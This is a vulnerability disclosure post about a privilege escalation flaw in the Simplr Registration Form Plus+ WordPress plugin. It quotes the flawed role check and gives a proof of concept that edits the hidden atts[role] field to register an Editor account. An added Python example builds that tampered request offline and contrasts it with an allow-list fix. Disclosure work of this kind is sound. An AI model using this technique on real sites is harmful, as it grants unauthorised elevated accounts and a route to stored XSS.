Privilege Escalation Vulnerability in Simplr Registration Form Plus+
We recently had a request for a file from the plugin Simplr Registration Form Plus+, /wp-content/plugins/simplr-registration-form/assets/simplr_reg.js, on one of our websites. A request for a file from a plugin that isn't installed on a website is usually an indication that someone is probing for usage of the plugin in order to exploit a vulnerability in it. After seeing the request we went looking for what the hacker might be trying to exploit in the plugin so that we could make sure it was in our data set. Since the plugin handles registering users, a security issue in it is a big concern. We didn't have any vulnerabilities for the plugin in our data set already, we couldn't find any public reports of vulnerabilities, and the plugin hadn't been updated in five months, so a vulnerability hadn't recently been fixed in it either. At that point we started to review the plugin for a security vulnerability that hackers might be interested in exploiting.
After checking for some of the common issues we have been seeing cause many security problems and finding none of them in this plugin, we moved on to the user registration capability, since a problem there is something a hacker would be interested in exploiting.
We first noticed that it was possible for Author level users to create a registration form where the role of the new user is Editor, which is a higher level user. So right there you have a privilege escalation vulnerability, though not something that would seem to be of interest to hackers, since they would first need access to an Author level account.
While looking into that issue we realized that there is a much larger related issue. When someone registers an account through the plugin they can control what role their account will have through the POST input "atts[role]".
The only limit the plugin imposes is that you cannot set the role to Administrator:
```php
// The role is taken straight from the POSTed atts[role] value.
$role = @$atts['role'];
if('' == $role) { $role = 'subscriber'; }
// A deny-list of exactly one role; every other role, including Editor, is accepted.
if('administrator' == $role) { wp_die('Do not use this form to register administrators'); }
if ( version_compare($wp_version, "3.1", "<" ) ) { require_once(ABSPATH . WPINC . '/registration.php' ); }
```
You can set it to the Editor role, which has the unfiltered_html capability (on a single-site install; on multisite WordPress strips that capability from everyone but super admins), so you could use that access for persistent cross-site scripting (XSS).
Proof of Concept
Add a user registration form to a post or page using the shortcode [register role="contributor" password="yes" fields=""]. While on the page with the newly added user registration form, use the developer tools of your web browser to edit the line
<input type="hidden" name="atts[role]" value="contributor" />
to
<input type="hidden" name="atts[role]" value="editor" />
Fill out the required form fields and then register the account. You will now have an Editor level account on the website.
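The following is an added example, not code from the original post or from the plugin. It models the role check quoted above and the proof of concept in one place: it parses a constructed stand-in for the form the shortcode renders, builds the POST body with atts[role] overridden to "editor" exactly as the browser edit does, runs that body through a reproduction of the plugin's deny-list check (which lets it through), and then through an allow-list check of my own design (not the maintainer's patch) that refuses it. The form markup, function names and the set of self-registration roles are assumptions made for the example.

```python
"""Added example (not the plugin's code): the role check quoted above,
the proof-of-concept request, and an allow-list alternative.

Assumptions (mine, not from the original post): SAMPLE_FORM_HTML is a
constructed stand-in for the [register] shortcode's output, and all
function names and the allow-list below are illustrative."""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode

# Constructed sample of the registration form markup. The hidden atts[role]
# field carries the role attribute from the shortcode ("contributor").
SAMPLE_FORM_HTML = """
<form method="post" action="/register/">
  <input type="hidden" name="atts[role]" value="contributor" />
  <input type="hidden" name="atts[password]" value="yes" />
  <input type="text" name="user_login" value="" />
  <input type="text" name="user_email" value="" />
  <input type="submit" name="submit" value="Register" />
</form>
"""


class _InputCollector(HTMLParser):
    """Collect the name/value pair of every <input> in the form."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        if a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""


def parse_form_fields(html):
    """Return {input name: value} for the form, hidden fields included."""
    parser = _InputCollector()
    parser.feed(html)
    return parser.fields


def build_poc_request(html, user_login, user_email, role="editor"):
    """Reproduce the PoC: keep every field the form sends, fill in the
    required ones, and override the hidden atts[role] value."""
    fields = parse_form_fields(html)
    fields.update({"user_login": user_login, "user_email": user_email})
    fields["atts[role]"] = role  # attacker-controlled value
    return urlencode(fields)


def decode_post_body(body):
    """Turn an application/x-www-form-urlencoded body back into a flat dict,
    as the server-side handler would see it."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_role_check(post):
    """Mirror of the plugin logic quoted above: a deny-list of one role.
    Any other role name in atts[role] is accepted as-is."""
    role = post.get("atts[role]", "")
    if role == "":
        role = "subscriber"
    if role == "administrator":
        raise PermissionError("Do not use this form to register administrators")
    return role


# Roles a site might reasonably let anonymous visitors self-assign (assumption).
ALLOWED_SELF_REGISTRATION_ROLES = {"subscriber", "contributor"}


def hardened_role_check(post):
    """Allow-list variant (my suggestion, not the maintainer's patch): a
    request may only select a role from a fixed, low-privilege set, so a
    tampered hidden field cannot reach Editor or any other unlisted role."""
    role = post.get("atts[role]", "") or "subscriber"
    if role not in ALLOWED_SELF_REGISTRATION_ROLES:
        raise PermissionError("role %r cannot be assigned by self-registration" % role)
    return role


if __name__ == "__main__":
    body = build_poc_request(SAMPLE_FORM_HTML, "bob", "bob@example.com")
    post = decode_post_body(body)
    print("PoC body:", body)
    print("vulnerable check assigns:", vulnerable_role_check(post))
    try:
        hardened_role_check(post)
    except PermissionError as e:
        print("allow-list check rejects:", e)
```

Nothing here sends a request; build_poc_request only produces the body a browser would submit after the hidden field is edited, so the example runs offline. The point of the allow-list version is that the hidden field stays client-controlled no matter what the shortcode says, so the server has to decide for itself which roles are acceptable rather than enumerating the ones that are not.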
Timeline
- 6/18/2016 – Developer notified.
- 6/21/2016 – WordPress.org Plugin Directory notified.
- 6/28/2016 – Removed from Plugin Directory.
Hey, I’m the maintainer of this plugin and I wanted to let you know that I have submitted a patch for this to the WordPress repo which should become available shortly. Thanks so much for posting!
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=1447882%40simplr-registration-form&old=1341363%40simplr-registration-form&sfp_email=&sfph_mail=
In our case it allowed spammers to skip the captcha.